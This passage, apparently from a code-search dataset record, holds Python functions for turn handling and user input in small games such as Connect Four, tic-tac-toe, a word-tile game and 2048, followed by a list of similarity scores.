_PLAYER else _PLAYER\n \n if winner == 0:\n msg = \"Tie!\"\n elif winner == 1:\n msg = \"You win!\"\n else:\n msg = \"I win!\"\n \n oled.text(msg, 64, 30)\n oled.show()\n print(\"\\n\" + msg + \"\\n\")\n \n if winner == 0 or winner == 1:\n if self.plies == 3:\n print(\"\"\"\n(Of course, you did set me to easy mode, which I feel compelled to mention.)\n\"\"\")\n print(\"\"\"\n\nThere are some interesting things to learn about ConnectFour:\n\n {url}\n\nTo move ahead:\n\n >>> import sensors\n >>> sensors.start()\n\n\"\"\".format(url=url(\"connectfour\")))\n\n else:\n print(\"\"\"\nWow. You were beat by a $4 computer--using only one of my processors (!!).\nTo get the code to move ahead, you'll need to at least tie me.\n\nTo play again, make a new instance of the ConnectFour class. 
You can choose\ndifferent options than the defaults:\n\n connectfour.ConnectFour(plies, start_player, serial_input, debug)\n - plies [5]: moves to look ahead (3-6, where 3 is easy and 6 is slow and hard\n - start_player [0]: 0 for random, 1 for you, 2 for me\n - serial_input [False]: Enter moves w/keyboard in terminal instead of knob\n - debug [False]: Show information about current AI evaluation scores\n\nFor example:\n\n >>> g = ConnectFour(plies=4, start_player=1)\n >>> g.play()\n\n\"\"\")", "def start_play(self, player1, player2, start_player=0, is_shown=1): # 下棋\n line = input().strip()\n full_input = json.loads(line)\n requests = full_input['requests']\n x = requests[0]['x']\n y = requests[0]['y']\n if x < 0:\n start_player = 1\n else:\n start_player = 0\n self.board.init_board(start_player) # 初始化棋盘\n p1, p2 = self.board.players # 两个棋手\n player1.set_player_ind(p1)\n player2.set_player_ind(p2)\n players = {p1: player1, p2: player2}\n if x >= 0:\n current_player = self.board.get_current_player() # 获取当前棋手\n player_in_turn = players[current_player]\n move = 80 - (x + 1) * 9 + y + 1\n self.board.do_move(move) # 进行落子\n while True:\n current_player = self.board.get_current_player() # 获取当前棋手\n player_in_turn = players[current_player]\n # self.board.set_current_availables() # 设定当前使用的availables\n move = player_in_turn.get_action(self.board)\n self.board.do_move(move) # 进行落子", "def advance_board(self):\n raise NotImplementedError", "def getInput():\t\n\tglobal active_\n\n\t#to disable the service \n\tactive_ = False \n\t\n\t# reading the previous input\n\tprev_input_ = rospy.get_param('/input')\n\tinput_ = prev_input_\n\t\n\t#in order to make the user to choose one of the 5 possible inputs\n\twhile (prev_input_ == input_) or (input_ > 5 or input_ < 1):\n\t\tif input_ > 5 or input_ < 1: \n\t\t\t#in the case in which the user make another selection\n\t\t\tprint \"Unknown input, please try again\" \n\t\t\n\t\t#propose to the user which are the real possibilities\n\t\tprint(\"Please select one of the following senteces\\n\")\n\t\tprint(\"1 - Move the robot randomly in the environment, by choosing one of six possible target positions\\n\")\n\t\tprint(\"2 - The user can chose the next target position\\n\")\n\t\tprint(\"3 - Start following the external walls\\n\")\n\t\tprint(\"4 - Stop the robot in the last position\\n\")\n\t\tprint(\"5 - Change the planning algorithm from move_base to bug0 and vice versa\\n\")\n\n\t\t#read the input typed by the user\t\n\t\tinput_ = (int(raw_input(\"Please select a number between 1 and 5: \")))\n\n\t#set the choice made by the user\n\tif input_ >= 1 and input_ <= 5:\n\t\trospy.set_param('/input', input_)", "def start_game(self):\n p1_move = True\n is_all_moves_over = False\n while not is_all_moves_over:\n\n while p1_move and not is_all_moves_over:\n p1 = int(input(\"Player 1 pos:\"))\n is_all_moves_over, p1_move = self.play('p1', p1, p1_move)\n\n while not p1_move and not is_all_moves_over:\n p2 = int(input(\"Player 2 pos:\"))\n is_all_moves_over, p1_move = self.play('p2', p2, p1_move)\n\n print(\"Game Ended in Draw\")", "def play(self):\n\n while self.board.board[self.board.target_location()[0]]\\\n [self.board.target_location()[1]] == \"E\": # the car didn't\n # arrive the exit\n self.__single_turn()\n print(\"you won!\")", "def human():\n table = [ \n \"-\", \"-\", \"-\", \n \"-\", \"-\", \"-\", \n \"-\", \"-\", \"-\", \n ]\n choices = choice()\n turn = [0,1,2,3,4,5,6,7,8]\n\n # while table still have available space, run until all boxes are filled\n while 
len(turn) != 0:\n \n # Player1's turn\n move_index, turn = table_check(table, turn) # Check if the index is valid\n table[move_index] = choices[0] # Fill X or O to the table base on the index chosen\n display_board(table) # Display to let them see for 2nd player's turn\n\n # The game cannot be won unless 5 moves has been played, so when turn has been reduced to 4 moves or less, check win\n # Check win before tie since last move might make it a win\n if len(turn) <= 4:\n win_condition, player = win_check(table)\n if win_condition == True:\n print(f\"\\nPlayer \\\"{player}\\\" won!!\\nThanks for playing!\")\n retry()\n\n # Player 1 will be the one who finish the game, so after filling every turn of player 1\n # we need to check if it's the last turn, if yes than break\n if len(turn) == 0:\n break\n \n # Player2's turn\n move_index, turn = table_check(table, turn) # Check if the index is valid\n table[move_index] = choices[1] # Fill X or O to the table base on the index chosen\n display_board(table) # Display to let them see for 2nd player's turn\n\n # The game cannot be won unless 5 moves has been played, so when turn has been reduced to 4 moves or less, check win\n if len(turn) <= 4:\n win_condition, player = win_check(table)\n if win_condition == True:\n print(f\"\\nPlayer \\\"{player}\\\" won!!\\nThanks for playing!\")\n retry()\n \n print(\"\\nDRAW!\")\n retry()", "def playGame(wordList):\n while True:\n user_input = str(input('Enter n to deal a new hand, r to replay the last hand, or e to end game: '))\n if user_input == 'e':\n break\n elif user_input == 'n':\n hand = dealHand(HAND_SIZE)\n playHand(hand, wordList, HAND_SIZE)\n elif user_input == 'r':\n try:\n playHand(hand, wordList, HAND_SIZE)\n except:\n print('You have not played a hand yet. Please play a new hand first!') \n else:\n print('Invalid command.')", "def human_move(board,player):\r\n \r\n s = input(\"Please input a legal move in a format of \\\"current_position-landing_position\\\", if the move is cantering or plain. In case of a capturing move, follow \\\"current_position-landing_position-enemy piece\\\": \")\r\n move = s.split('-')\r\n legal = legal_moves(board,player)\r\n execution(move,legal,board,player)", "def main():\n\n print('R-In-A-Row')\n print()\n\n while True:\n if play == 'human vs human':\n human1Tile, human2Tile = enterHuman1Tile()\n\n turn = whoGoesFirst()\n print('The %s player will got first.' % (turn))\n mainBoard = getNewBoard()\n elif play == 'human vs computer':\n human1Tile, computer1Tile = enterHuman1Tile()\n turn = whoGoesFirst()\n print('The %s player will go first.' % (turn))\n mainBoard = getNewBoard()\n elif play == 'computer vs computer':\n computer1Tile, computer2Tile = enterHuman1Tile()\n turn = whoGoesFirst()\n print('The %s player will go first.' 
% (turn))\n\n\n while True:\n if play == 'human vs human':\n if turn == 'human1':\n drawBoard(mainBoard)\n move = getHuman1Move(mainBoard)\n\n makeMove(mainBoard, human1Tile, move)\n\n if isWinner(mainBoard, human1Tile):\n winner = 'human1'\n\n break\n turn = 'human2'\n if turn == 'human2':\n drawBoard(mainBoard)\n move2 = getHuman2Move(mainBoard)\n makeMove(mainBoard, human2Tile, move2)\n if isWinner(mainBoard, human2Tile):\n winner = 'human2'\n break\n turn = 'human1'\n\n elif play == 'human vs computer' :\n if turn == 'human':\n drawBoard(mainBoard)\n move = getHuman1Move(mainBoard)\n makeMove(mainBoard, human1Tile, move)\n if isWinner(mainBoard, human1Tile):\n winner = 'human'\n\n break\n turn ='computer'\n\n elif turn == 'computer':\n drawBoard(mainBoard)\n print('The computer is thinking...')\n move = getComputer1Move(mainBoard, computer1Tile)\n makeMove(mainBoard, computer1Tile, move)\n if isWinner(mainBoard, computer1Tile):\n winner = 'computer'\n break\n turn = 'human'\n elif play == 'computer vs computer':\n if turn == 'computer1':\n drawBoard(mainBoard)\n print('computer1 is thinking...')\n move = getComputer1Move(mainBoard, computer1Tile)\n makeMove(mainBoard, computer1Tile, move)\n if isWinner(mainBoard, computer1Tile):\n winner = 'computer1'\n break\n turn = 'computer2'\n elif turn == 'computer2':\n drawBoard(mainBoard)\n print('computer2 is thinking...')\n move = getComputer2Move(mainBoard, computer2Tile)\n makeMove(mainBoard, computer2Tile, move)\n if isWinner(mainBoard, computer2Tile):\n winner = 'computer2'\n break\n turn = 'computer1'\n\n\n if isBoardFull(mainBoard):\n winner = 'tie'\n break\n\n drawBoard(mainBoard)\n print('Winner is: %s' % winner)\n if not playAgain():\n break", "def requestMove(self) -> None:\n\n # player's turn to make a move\n if self.whoseTurn == self.player:\n position: int = int(input(f\"{self.player.getName()}'s turn : \"))\n self.player.insertSymbol(position)\n self.whoseTurn = self.ai\n\n # AI's turn to make a move\n else:\n print(f\"{self.ai.getName()}'s turn\")\n self.ai.makeBestMove()\n self.whoseTurn = self.player", "def play_one_move(self):\n self.print(\"top of move\")\n # 1) grab three cups\n c1 = self.take_cup_after(self.current_cup_idx())\n c2 = self.take_cup_after(self.current_cup_idx())\n c3 = self.take_cup_after(self.current_cup_idx())\n print(f\"pick up: {c1}, {c2}, {c3}\")\n self.print(\"after pickup\")\n\n # 2) find a destination cup\n destination_idx = self.find_next_destination(self.current_cup)\n print(\n f\"destination index is {destination_idx}, cup is {self.cups[destination_idx]}\"\n )\n\n # 3) insert cups back into the circle\n self.add_cups(destination_idx, [c1, c2, c3])\n self.print(\"after adding cups..\")\n\n # 4) select the next cup\n self.select_next_cup()\n\n self.print(\"post move\")", "def askformove(b):\n while True:\n print(b)\n userInput = input(\"enter your move \")\n try:\n userInput= int(userInput)\n assert(userInput <= b.width )\n assert(b.allowsMove(userInput))\n except (ValueError,AssertionError):\n print(\"enter a diff move\")\n continue\n return userInput", "def handle_turn(cls, key):\n entered = str(key).replace(\"'\", \"\")\n\n if entered in ['a','s','d','w']:\n switcher = {\n 'w': cls.up,\n 's': cls.down,\n 'a': cls.left,\n 'd': cls.right,\n }\n switcher.get(entered)()\n cls.display_board(True)\n \n elif entered in cls.positions:\n cls.position = int(entered) - 1\n\n elif entered == 'Key.enter':\n row, col = cls.get_position_coords()\n if cls.board[row][col] == cls.empty:\n # Board will place an X 
or O on the number slot chosen\n cls.board[row][col] = cls.current_player\n\n # Check if the game has ended\n cls.is_game_over()\n\n # Flip to other player\n cls.flip_player()\n\n # Declare winner and clear board\n if(cls.winner):\n print(f'{cls.winner} wins!')\n input('Press enter to play again.')\n cls.clear_board()\n else:\n print(\"You can't go there. Asshole.\")", "def run(self):\n print(\"WELCOME TO MINESWEEPER!\")\n\n\n while True:\n\n self.get_input()\n start_game(self.rows, self.cols, self.mines)", "def getMove(player,first_move=False):\n while True: \n move = raw_input(\"MAKE YOUR MOVE: \").upper()\n\n # handle special commands\n if move == \"QUIT\" or move == \"Q\":\n wannaQuit()\n continue\n elif move == \"QUIT!\" or move == \"Q!\":\n if SAY_PROC:\n SAY_PROC.terminate()\n sys.exit()\n continue\n elif move == \"HELP\" or move == \"H\":\n help()\n continue\n elif move == \"HELP!\" or move == \"H!\":\n say(helpString())\n continue\n elif move == \"SHUTUP!\" or move == \"S!\":\n shutUp(fuck=True)\n continue\n elif move == \"SHUTUP\" or move == \"S\":\n shutUp()\n continue\n elif move == \"BOARD\" or move == \"B\":\n printBoard()\n continue\n elif move == \"CLEAR\" or move == \"C\": \n clearTerminal()\n printBoard()\n continue\n elif move == \"CLEAR!\" or move == \"C!\": # TODO board -> clear, you end up with a half drawn new board. clear again fixes this\n clearTerminalAndBuffer()\n printBoard()\n continue\n elif move == \"PASS\" or move == \"P\": \n if wannaPass():\n break\n else:\n continue\n elif move == \"PASS!\" or move == \"P!\": \n break\n \n # mostly used to catch blank lines or me typing ASFADS like an asshole\n if len(move) < 7:\n print \"That's too short to be a command.\"\n continue\n\n parts=move.split(\":\")\n if len(parts) != 3:\n print \"Can't find all the parts of the move command. Maybe you're missing/have too many \\\":\\\"?\"\n continue\n\n for item in parts:\n if len(item) == 0:\n print \"Found a blank command. Maybe you left in an extra \\\":\\\"?\"\n continue\n\n coords = parts[0].replace(\" \",\"\") # incase of space inbetween file and rank\n direction = parts[1].strip()\n word = parts[2].strip()\n\n if not coords[0].isalpha():\n print \"I don't know where to put your word (Bad file coord).\"\n continue\n\n if not coords[1:].isdigit():\n print \"I don't know where to put your word (Bad rank coord).\"\n continue\n\n x = gridCharToInt(coords[0])\n y = int(coords[1:]) - 1\n if 14 < x < 0 or 14 < y < 0:\n print \"Those aren't coords on the board. 
Valid Files are from A-O, valid Ranks are 1-15.\"\n continue\n\n if first_move:\n if x != 7 or y != 7:\n print \"The first move must start from the center (H8).\"\n continue\n\n #compact that command\n if direction == \"ACROSS\":\n direction = \"A\"\n elif direction == \"DOWN\":\n direction = \"D\"\n if direction != \"A\" and direction !=\"D\":\n print \"I don't know where to put your word (Across or Down?).\"\n continue\n \n score,placed_tiles = checkWords(x,y,direction,word,first_move)\n if not score: #error reporting is handling in check words\n continue\n else:\n for tile in placed_tiles:\n if not tile in player.rack:\n print \"You don't have the tiles to play that!\"\n continue\n player.rack.remove(tile)\n print player.name+\" scored \"+str(score)+\" on that last play!\"\n player.score+=score\n for tile in placed_tiles:\n player.rack.remove(tile)\n break #YAY", "def main():\n\tcolorama.init()\n\n\n\n\tgrid = get_start_grid(*map(int,sys.argv[1:]))\n\tprint_grid(grid)\n\n\twhile True:\n\t\tgrid_copy = copy.deepcopy(grid)\n\t\tget_input = getch(\"Enter direction (w/a/s/d/n/r/q): \")\n\t\tif get_input in functions:\t\n\t\t\tfunctions[get_input](grid)\n\t\telif get_input == \"n\":\n\t\t\tif get_next_action(grid) == '':\n\t\t\t\tprint(\"Checkmate!\")\n\t\t\t\tbreak\n\t\t\tfunctions[get_next_action(grid)](grid)\n\t\telif get_input == \"r\":\n\t\t\tbreak\n\t\telif get_input == \"q\":\n\t\t\tbreak\n\t\telse:\n\t\t\tprint(\"\\nInvalid choice.\")\n\t\t\tcontinue\n\t\tif grid != grid_copy:\n\t\t\tif not prepare_next_turn(grid):\n\t\t\t\tprint_grid(grid)\n\t\t\t\tprint(\"Well played!\")\n\t\t\t\tbreak\n\t\tprint_grid(grid)\n\t\n\tif get_input == \"r\":\n\t\twhile True:\n\t\t\tgrid_copy = copy.deepcopy(grid)\n\n\t\t\tnext_action = get_next_action(grid)\n\t\t\tif next_action == '':\n\t\t\t\tprint(\"Checkmate!\")\n\t\t\t\tbreak\n\t\t\t\n\t\t\tfunctions[next_action](grid)\n\t\t\tif grid != grid_copy:\n\t\t\t\tif not prepare_next_turn(grid):\n\t\t\t\t\tprint_grid(grid)\n\t\t\t\t\tprint(\"Well played!\")\n\t\t\t\t\tbreak\n\t\t\tprint_grid(grid)\n\n\tprint(\"Thanks for playing.\")", "def play_game():\n clear()\n print(\" 1 | 2 | 3 \\n --- --- --- \\n\"\n \" 4 | 5 | 6 \\n --- --- --- \\n\"\n \" 7 | 8 | 9 \")\n player = 'Player_one'\n continue_game = True\n while continue_game:\n position = game.ask(player=player)\n if position is False:\n print(\"Please enter a number from 1-9.\")\n position = game.ask(player=player)\n clear()\n update_and_switch = game.update_and_switch(position, player=player)\n if update_and_switch is False:\n position = game.ask(player=player)\n game.update_and_switch(position, player=player)\n else:\n player = game.switch_player(player)\n continue_game = game.evaluate_winner()\n\n restart = input(\"Do you want to play again? 
(yes or no)\\n\").lower()\n if restart == 'yes':\n game.list = [\" \", \" \", \" \", \" \", \" \", \" \", \" \", \" \", \" \"]\n play_game()\n\n else:\n clear()\n print(\"Bye 👋 Hope you had fun!\")", "def player_loop(self):\n\n # Generate game tree object\n first_msg = self.receiver()\n # Initialize your minimax model\n model = self.initialize_model(initial_data=first_msg)\n\n while True:\n msg = self.receiver()\n\n # Create the root node of the game tree\n node = Node(message=msg, player=0)\n\n # Possible next moves: \"stay\", \"left\", \"right\", \"up\", \"down\"\n best_move = self.search_best_next_move(\n model=model, initial_tree_node=node)\n\n # Execute next action\n self.sender({\"action\": best_move, \"search_time\": None})", "def example(self):\n while self.check_end() == False:\n plt.pause(0.25)\n end = self.update_board(random.choice(self.get_actions()), True)", "def interact():\r\n\tboard = None\r\n\tline = raw_input(\"Enter Command (h for help): \")\r\n\tline = line.replace(\" \", \"\")\r\n\twhile line and line[0] != \"q\":\r\n\t\tcommand = line[0]\r\n\t\tif command == 'n': \r\n\t\t\tcoordinates = ast.literal_eval(line[1:])\r\n\t\t\trows = coordinates[0]\r\n\t\t\tcols = coordinates[1]\r\n\t\t\tboard = createBoard(int(rows),int(cols))\r\n\t\telif command == 'i':\r\n\t\t\tliveCells = ast.literal_eval(line[1:])\r\n\t\t\tfor cells in liveCells:\r\n\t\t\t\tboard[cells[0]-1][cells[1]-1] = 1\r\n\t\telif command == 'p':\r\n\t\t\tprintBoard(board)\r\n\t\telif command == 'r':\r\n\t\t\tnumOfGens = ast.literal_eval(line[1:])\r\n\t\t\tfor n in range(numOfGens):\r\n\t\t\t\tboard = next_life_generation(board)\r\n\t\t\t\tprintBoard2(board)\r\n\t\telif command == 's':\r\n\t\t\tprintBoard2(board)\r\n\t\telif command == 'd':\r\n\t\t\tprintBoard2(board)\r\n\t\telif command == 'h':\r\n\t\t\tprint(\"\"\" \r\nCommands:\r\nn\t[height,width] (Create a height * width board)\r\ni\t(initialize life)\r\np\t(print the board)\r\ns\t(display the board)\r\nr\t(advance n generations, displaying each after)\r\nh\t(display this help reminder)\r\n\r\nq\t(quit)\"\"\")\r\n\t\tline = raw_input(\"Enter Command (h for help): \")\r\n\t\tline = line.replace(\" \", \"\")\r\n\tprint \"Life is over\\n\"", "def choose_action(self, board, possible_actions):\r\n self._print_board(board)\r\n while True:\r\n user_choice = int(input(\"Which Field?\"))\r\n if user_choice in possible_actions:\r\n return user_choice\r\n else:\r\n print('Action not possible!')" ]
[ "0.72409004", "0.64886266", "0.6171364", "0.59191036", "0.59139985", "0.5860547", "0.57915825", "0.5791442", "0.5777218", "0.57734597", "0.5769721", "0.5763385", "0.5751395", "0.5743939", "0.5728276", "0.5692042", "0.56845224", "0.5682954", "0.56781256", "0.56780386", "0.5671816", "0.5670868", "0.56655097", "0.5663507", "0.56496686", "0.55943656", "0.5592782", "0.55787945", "0.55751777", "0.55740297", "0.5563226", "0.55628335", "0.554938", "0.55492765", "0.5539126", "0.553318", "0.55285054", "0.5524531", "0.5521579", "0.55104035", "0.5504342", "0.5501734", "0.5501111", "0.5498762", "0.54937494", "0.549218", "0.5491433", "0.5478397", "0.5478195", "0.54765", "0.54728746", "0.5472133", "0.5466114", "0.5455482", "0.5454376", "0.54515916", "0.5443353", "0.5435266", "0.54266477", "0.5424331", "0.54232806", "0.5421104", "0.54192513", "0.5416677", "0.5414112", "0.5404775", "0.54008293", "0.53854054", "0.5355538", "0.53508055", "0.53507966", "0.5330017", "0.53268033", "0.5326353", "0.5325953", "0.5322363", "0.53219473", "0.5319936", "0.5316884", "0.5312331", "0.5311735", "0.5310094", "0.53096145", "0.5309493", "0.5302804", "0.5302266", "0.529988", "0.52980065", "0.5292381", "0.52897596", "0.5285153", "0.52786034", "0.52785814", "0.5277133", "0.52750534", "0.52748126", "0.5273247", "0.5272842", "0.5272222", "0.52721655" ]
0.6859589
1
gathers selected cards in order to take action on selected cards (either discarding them or preparing them)
def gatherSelected(self):
    self.selected_list = []
    for element in self.hand_info:
        if element.status == 1:
            self.selected_list.append(element)
    return self.selected_list
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def pick(self, pack, cards_owned, draft_info):\n pass", "def card_sel(\n self, num=1, **kwargs\n ): # pylint: disable=too-many-locals, too-many-branches\n selectfrom = self.card_selSource(**kwargs)\n force = kwargs[\"force\"] if \"force\" in kwargs else False\n showdesc = kwargs[\"showdesc\"] if \"showdesc\" in kwargs else True\n verbs = kwargs.get(\"verbs\", (\"Select\", \"Unselect\"))\n\n if \"prompt\" in kwargs:\n self.output(kwargs[\"prompt\"])\n\n if \"anynum\" in kwargs and kwargs[\"anynum\"]:\n anynum = True\n num = 0\n else:\n anynum = False\n\n selected = []\n types = kwargs[\"types\"] if \"types\" in kwargs else {}\n types = self._type_selector(types)\n while True:\n options = []\n if (\n anynum\n or (force and num == len(selected))\n or (not force and num >= len(selected))\n ):\n o = Option(selector=\"0\", verb=\"Finish Selecting\", card=None)\n options.append(o)\n index = 1\n for c in sorted(selectfrom):\n if \"exclude\" in kwargs and c.name in kwargs[\"exclude\"]:\n continue\n if not self.select_by_type(c, types):\n continue\n sel = \"%d\" % index\n index += 1\n if c not in selected:\n verb = verbs[0]\n else:\n verb = verbs[1]\n o = Option(selector=sel, verb=verb, card=c, name=c.name)\n if showdesc:\n o[\"desc\"] = c.description(self)\n if kwargs.get(\"printcost\"):\n o[\"details\"] = str(self.card_cost(c))\n if kwargs.get(\"printtypes\"):\n o[\"details\"] = c.get_cardtype_repr()\n options.append(o)\n ui = self.user_input(options, \"Select which card?\")\n if not ui[\"card\"]:\n break\n if ui[\"card\"] in selected:\n selected.remove(ui[\"card\"])\n else:\n selected.append(ui[\"card\"])\n if num == 1 and len(selected) == 1:\n break\n return selected", "def card(bot, update):\n query = update.callback_query\n user = query.from_user\n chat_id = query.message.chat_id\n selected_card = query.data\n\n if (chats[chat_id].player1.card_played == []) and (chats[chat_id].player2.card_played == []):\n bot.send_message(text=Strings.CARD_SELECTED.format(user.first_name),\n chat_id=query.message.chat_id,\n message_id=query.message.message_id,\n parse_mode=ParseMode.MARKDOWN,\n isgroup=True)\n if chats[chat_id].player1.user == user:\n chats[chat_id].player1.card_played = chats[chat_id].player1.hand[int(selected_card)]\n chats[chat_id].player1.hand.remove(chats[chat_id].player1.hand[int(selected_card)])\n\n elif chats[chat_id].player2.user == user:\n chats[chat_id].player2.card_played = chats[chat_id].player2.hand[int(selected_card)]\n chats[chat_id].player2.hand.remove(chats[chat_id].player2.hand[int(selected_card)])\n return CARD\n\n else:\n if chats[chat_id].player1.user == user and chats[chat_id].player1.card_played != []:\n bot.send_message(text=Strings.CARD_SELECTED2.format(user.first_name),\n chat_id=query.message.chat_id,\n message_id=query.message.message_id,\n parse_mode=ParseMode.MARKDOWN, isgroup=True)\n return CARD\n elif chats[chat_id].player2.user == user and chats[chat_id].player2.card_played != []:\n bot.send_message(text=Strings.CARD_SELECTED2.format(user.first_name),\n chat_id=query.message.chat_id,\n message_id=query.message.message_id,\n parse_mode=ParseMode.MARKDOWN, isgroup=True)\n return CARD\n else:\n if chats[chat_id].player1.user == user:\n chats[chat_id].player1.card_played = chats[chat_id].player1.hand[int(selected_card)]\n chats[chat_id].player1.hand.remove(chats[chat_id].player1.hand[int(selected_card)])\n\n elif chats[chat_id].player2.user == user:\n chats[chat_id].player2.card_played = chats[chat_id].player2.hand[int(selected_card)]\n 
chats[chat_id].player2.hand.remove(chats[chat_id].player2.hand[int(selected_card)])\n\n bot.edit_message_text(text=Strings.CARD_SELECTED.format(user.first_name),\n chat_id=query.message.chat_id,\n message_id=query.message.message_id,\n parse_mode=ParseMode.MARKDOWN)\n bot.send_message(chat_id,\n Strings.SELECTION_COMPLETED,\n parse_mode=ParseMode.MARKDOWN, isgroup=True)\n\n reply_markup = ReplyKeyboardMarkup(c_b_keyboard, selective=False)\n bot.send_message(chat_id,\n Strings.QUESTION,\n reply_markup=reply_markup,\n parse_mode=ParseMode.MARKDOWN, isgroup=True)\n return BET_CHECK", "def choose_card(playable_cards):\r\n\r\n playing = playable_cards[0]\r\n print('\\n choosing \\n', playing)\r\n\r\n return playing # for now\r", "def next_card_selection(deck):\n # First grab the colors and format\n # Then generate the query, execute, and trim\n # Then get the selections, and return them!\n colors = deck['colors']\n deck_format = deck['format']\n seed = deck.get('seed')\n\n query_type = pick_next_card_query(deck_format, seed)\n trimmed_query_results = compile_execute_and_trim_query(colors, query_type, deck_format)\n selections = generate_pickable_selections(trimmed_query_results, deck_format, deck)\n print('QUERY: ', query_type, ' NUM RESULTS:', len(trimmed_query_results))\n\n return selections", "def choose_card_to_discard(self):\n random.choice(self.hand.card_list).use()", "def select_card(self, cards):\n idx = -1 # should not be inital value\n while True:\n print(\"Please select a card by index:\")\n inpt = self.input(list(enumerate(cards)))\n try:\n idx = int(inpt)\n except ValueError:\n print(f\"'{inpt}' is not a valid index.\")\n if idx < 0 or idx >= len(cards):\n print(f\"The index {idx} is not available.\")\n else:\n break\n assert idx != -1 # make sure it's not initial value\n return cards.pop(idx)", "def cards(self, cards):\n\n self._cards = cards", "def cards(self, cards):\n\n self._cards = cards", "def choose_card(self, state=None):\n # if self.at_last_stich():\n # allowed = yield self.cards[0]\n # else:\n self.observation_received.acquire()\n self.observation = self.build_observation(state, self.cards)\n logger.debug(f\"choose_card received observation: {self.observation}\")\n self.observation_received.notify_all() # notify all threads to be sure\n self.observation_received.release()\n\n self.action_received.acquire()\n received = self.action_received.wait()\n if not received:\n logger.debug(\"Timeout occurred. action_received condition has not been notified.\")\n logger.debug(f\"choose_card received action: {self.action}\")\n allowed_cards = self.allowed_cards(state=state)\n chosen_card = allowed_cards[0] # set chosen_card to the first allowed card in case anything goes south\n chosen_card = self.set_chosen_card(allowed_cards, chosen_card)\n self.action_received.release()\n\n allowed = yield chosen_card\n\n if allowed:\n yield None", "def set_chosen_card(self, allowed_cards, chosen_card):\n if self.action is not None:\n if self.action in allowed_cards:\n logger.info(f\"Successfully chose the card: {self.action}\")\n chosen_card = self.action\n else:\n logger.error(f\"{self.action} is not a valid card! 
Choosing the first allowed card now.\")\n else:\n logger.debug(\"chosen card is None\")\n return chosen_card", "def play_selected_card(_screen, player):\n card = Card(player.selected_card.card_id, 400, 350)\n card.image_of_card(_screen)", "def play_all(self):\n for _ in range(self._hand.size()):\n card = self._hand.pop()\n self._active.push(card)\n self._money = self._money + card.money\n self._attack = self._attack + card.attack\n print '\\nPlayed all cards!'", "def deal_cards():\n for _ in range(2):\n user_cards.append(random.choice(deck))\n dealer_cards.append(random.choice(deck))", "def cards(self) -> None:\n self._cards = []", "def Deal():\r\n cardsout = []\r\n cardoptions = [0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23]\r\n topcardoptions = [0,2,3,4,5,6]\r\n topcard = topcardoptions[random.randint(0,5)]\r\n cardoptions.pop(cardoptions.index(topcard))\r\n cardsout.append(topcard)\r\n\r\n if SHOWHAPPENINGS == True:\r\n disp = card_dict[topcard]\r\n print(\"Topcard is: {}\".format(disp)) \r\n\r\n for i in range(4):\r\n numcards = 0\r\n while numcards < 5:\r\n possiblerange = len(cardoptions) - 1\r\n cardindex = random.randint(0,possiblerange)\r\n card = cardoptions[cardindex]\r\n cardsout.append(card)\r\n cardoptions.pop(cardoptions.index(card))\r\n PlayerHands[i].append(card)\r\n numcards += 1\r\n PlayerHands[i] = sorted(PlayerHands[i]) #putting into ascending order\r\n if i == 0 or i == 2:\r\n PlayerHands[i].append(\"RedTeam\")\r\n else: \r\n PlayerHands[i].append(\"BlackTeam\")\r\n \r\n PlayerHands[0].append(PLAYER1)\r\n PlayerHands[1].append(PLAYER2)\r\n PlayerHands[2].append(PLAYER3)\r\n PlayerHands[3].append(PLAYER4)\r\n #PlayerHand format = [card1,card2,card3,card4,card5,Team,Name]\r\n\r\n return topcard", "def going_out(self, cards):\n for card in cards:\n self.out_of_use.append(int(card))\n # print(self.out_of_use)", "def followUpAttack(self, validCards):\n print(\"Select card from... 
\")\n cardManager.printHand(validCards)\n card = int(input(\"to your attack: \"))\n while card not in validCards: # error checking\n print(card)\n print(\"Please select a valid card from...\")\n cardManager.printHand(validCards)\n card = int(input(\"to your attack: \"))\n self.currentHand.remove(card)\n card = self.checkDoubles(card)\n return card", "def clearCards(self):\r\n self.cards = []", "def __init__(self):\r\n self.cards = []", "def open_cards(self) -> None:\r\n self.dealer.deal_cards_to(self.card_stack, PokerRules.CARDS_PER_ROUND[self.round_num])", "def get_card_list(self):\n return self.cards", "def __init__(self):\n self._cards = []", "def upgrade_all_cards(self):\n self.game.go_to_comic_cards()\n logger.info(\"Comic Cards: upgrading all available cards.\")\n if wait_until(self.emulator.is_ui_element_on_screen, timeout=3, ui_element=self.ui['CARDS_UPGRADE_ALL']):\n self.emulator.click_button(self.ui['CARDS_UPGRADE_ALL'].button)\n for card_index in range(1, 6):\n card_select_ui = self.ui[f'CARDS_SELECT_GRADE_{card_index}']\n self.emulator.click_button(card_select_ui.button)\n logger.debug(f\"Comic Cards: starting to upgrade UI Element {card_select_ui.name}\")\n if not wait_until(self.emulator.is_image_on_screen, timeout=3, ui_element=card_select_ui):\n logger.warning(\"Comic Cards: can't select card's grade.\")\n continue\n logger.debug(f\"Comic Cards: successfully selected UI Element {card_select_ui.name}\")\n self.emulator.click_button(self.ui['CARDS_SELECT_GRADE'].button)\n if wait_until(self.emulator.is_ui_element_on_screen, timeout=3,\n ui_element=self.ui['CARDS_UPGRADE_CONFIRM']):\n self.emulator.click_button(self.ui['CARDS_UPGRADE_CONFIRM'].button)\n if wait_until(self.emulator.is_ui_element_on_screen, timeout=10,\n ui_element=self.ui['CARDS_UPGRADE_RESULTS_OK']):\n logger.debug(f\"Comic Cards: successfully upgraded UI Element {card_select_ui.name}\")\n self.emulator.click_button(self.ui['CARDS_UPGRADE_RESULTS_OK'].button)\n wait_until(self.emulator.is_image_on_screen, timeout=3, ui_element=card_select_ui)\n continue\n if wait_until(self.emulator.is_ui_element_on_screen, timeout=3, ui_element=self.ui['CARDS_UPGRADE_ALL_CANCEL']):\n self.emulator.click_button(self.ui['CARDS_UPGRADE_ALL_CANCEL'].button)\n self.close_after_mission_notifications()\n self.game.go_to_main_menu()", "def __init__(self, cards):\n self.cards = cards", "def user_turn(self):\r\n\r\n self.display_state() # display the current state\r\n print(\r\n '\\nTURN: You -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-')\r\n # Get the row and col number of the card you want to select\r\n x1, y1 = self.input_validation('Enter the location of the first card you pick (row, col) -> ')\r\n self.selected = [x1, y1] # a temporary holder for the first choice\r\n\r\n # Get the corresponding card ID which is also the key for the dictionary with all the cards\r\n choice1_key = 